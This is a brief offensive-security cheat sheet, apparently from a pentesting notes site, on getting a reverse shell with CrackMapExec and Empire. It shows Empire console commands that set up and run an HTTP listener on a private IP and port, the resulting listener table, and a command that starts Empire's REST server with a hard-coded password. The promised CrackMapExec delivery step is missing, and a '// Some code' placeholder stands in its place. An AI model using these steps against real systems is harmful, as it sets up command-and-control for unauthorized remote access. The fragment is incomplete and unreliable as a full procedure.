🔴
CME Reverse Shell with Empire
Ger a reverse shell using CrackMapExec and Empire.
(Empire: listeners) > set Name test
(Empire: listeners) > set Host 192.168.20.3
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire-cert.pem
(Empire: listeners) > run
(Empire: listeners) > list
[*] Active listeners:
ID Name Host Type Delay/Jitter KillDate Redirect Target
-- ---- ---- ------- ------------ -------- ---------------
1 rfs_test http://192.168.20.3:9090 native 5/0.0
(Empire: listeners) >
python empire --rest --user empireadmin --pass Password123!
// Some code